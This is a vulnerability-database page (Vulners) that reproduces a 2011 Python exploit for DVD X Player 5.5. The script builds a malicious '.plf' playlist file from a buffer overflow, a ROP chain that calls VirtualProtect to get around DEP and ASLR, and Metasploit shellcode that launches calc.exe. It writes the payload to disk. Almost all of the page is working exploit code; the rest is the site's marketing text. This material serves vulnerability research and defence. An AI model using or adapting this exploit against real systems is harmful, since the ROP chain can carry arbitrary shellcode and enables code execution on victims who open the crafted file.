Vulners
Lucene search
DVD X Player 5.5.0 Professional / Standard - '.plf' File Universal (ASLR + DEP Bypass)
// # Author: sickness
// # Take a look at mona.py :) awesome tool developed by corelanc0d3r and his team: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
// # -----------------------------------------------------------
// # Exploit Title: DVD X Player 5.5 Professional (.plf) Universal DEP + ASLR BYPASS
// # Software Download: http://www.dvd-x-player.com/download.html#dvdPlayer
// # Date: 30/08/2011
// # PoC: http://www.exploit-db.com/exploits/17745/
// # Tested on: Windows XP SP2, Windows XP SP3, Windows 7
// # Testers: _ming, g0tmi1k, corelanc0d3r, ryujin, sinn3r O_o.
import sys,os
rop = "\x02\x67\x62\x61" # POP EAX # RETN [EPG.dll]
rop += "\x90\x90\x90\x90" # PADDING
rop += "\x90\x90\x90\x90" # PADDING
rop += "\x90\x90\x90\x90" # PADDING
rop += "\x90\x90\x90\x90" # PADDING
rop += "\x08\x11\x01\x10" # POINTER TO VirtualProtect() [IAT SkinScrollBar.Dll]
rop += "\xed\x06\x63\x61" # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll]
rop += "\xd8\x85\x63\x61" # XCHG EAX,ESI # RETN 00 [EPG.dll]
rop += "\x02\xd2\x62\x61" # POP EBP # RETN [EPG.dll]
rop += "\xc8\xca\x60\x61" # PUSH ESP [EPG.dll]
rop += "\x02\x67\x62\x61" # POP EAX # RETN [EPG.dll]
rop += "\xff\xfa\xff\xff" # AFTER NEGATE --> 0x00000501
rop += "\x9c\x7d\x62\x61" # NEG EAX # RETN [EPG.dll]
rop += "\x24\x01\x64\x61" # XCHG EAX,EBX # RETN [EPG.dll]
rop += "\x02\x67\x62\x61" # POP EAX # RETN [EPG.dll]
rop += "\xc0\xff\xff\xff" # AFTER NEGATE --> 0x00000040
rop += "\x9c\x7d\x62\x61" # NEG EAX # RETN [EPG.dll]
rop += "\xa2\x8b\x60\x61" # XCHG EAX,EDX # RETN [EPG.dll]
rop += "\x04\xb8\x60\x61" # POP ECX # RETN [EPG.dll]
rop += "\x54\x10\x66\x61" # WRITABLE LOCATION [EPG.dll]
rop += "\x87\xe5\x62\x61" # POP EDI # RETN [EPG.dll]
rop += "\x1d\x08\x63\x61" # RETN (ROP NOP) [EPG.dll]
rop += "\x02\x67\x62\x61" # POP EAX # RETN [EPG.dll]
rop += "\x90\x90\x90\x90" # PADDING
rop += "\x31\x08\x62\x61" # PUSHAD # RETN [EPG.dll]
# Metasploit calc.exe shellcode -b "\x00\x0a\x0d\x1a\x20"
buf = ""
buf += "\xba\xad\xe1\xd9\x21\xda\xd8\xd9\x74\x24\xf4\x5e\x33"
buf += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xa2\x03"
buf += "\x2c\xdd\x54\x41\xcf\x1e\xa4\x26\x59\xfb\x95\x66\x3d"
buf += "\x8f\x85\x56\x35\xdd\x29\x1c\x1b\xf6\xba\x50\xb4\xf9"
buf += "\x0b\xde\xe2\x34\x8c\x73\xd6\x57\x0e\x8e\x0b\xb8\x2f"
buf += "\x41\x5e\xb9\x68\xbc\x93\xeb\x21\xca\x06\x1c\x46\x86"
buf += "\x9a\x97\x14\x06\x9b\x44\xec\x29\x8a\xda\x67\x70\x0c"
buf += "\xdc\xa4\x08\x05\xc6\xa9\x35\xdf\x7d\x19\xc1\xde\x57"
buf += "\x50\x2a\x4c\x96\x5d\xd9\x8c\xde\x59\x02\xfb\x16\x9a"
buf += "\xbf\xfc\xec\xe1\x1b\x88\xf6\x41\xef\x2a\xd3\x70\x3c"
buf += "\xac\x90\x7e\x89\xba\xff\x62\x0c\x6e\x74\x9e\x85\x91"
buf += "\x5b\x17\xdd\xb5\x7f\x7c\x85\xd4\x26\xd8\x68\xe8\x39"
buf += "\x83\xd5\x4c\x31\x29\x01\xfd\x18\x27\xd4\x73\x27\x05"
buf += "\xd6\x8b\x28\x39\xbf\xba\xa3\xd6\xb8\x42\x66\x93\x37"
buf += "\x09\x2b\xb5\xdf\xd4\xb9\x84\xbd\xe6\x17\xca\xbb\x64"
buf += "\x92\xb2\x3f\x74\xd7\xb7\x04\x32\x0b\xc5\x15\xd7\x2b"
buf += "\x7a\x15\xf2\x4f\x1d\x85\x9e\xa1\xb8\x2d\x04\xbe"
exploit = "\x41" * 260 + rop + "\x90" * 20 + buf + "\x90" * 50
file = open("malicious.plf", "w")
file.write(exploit)
file.close()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Aug 2011 00:00Current
7.4High risk
Vulners AI Score7.4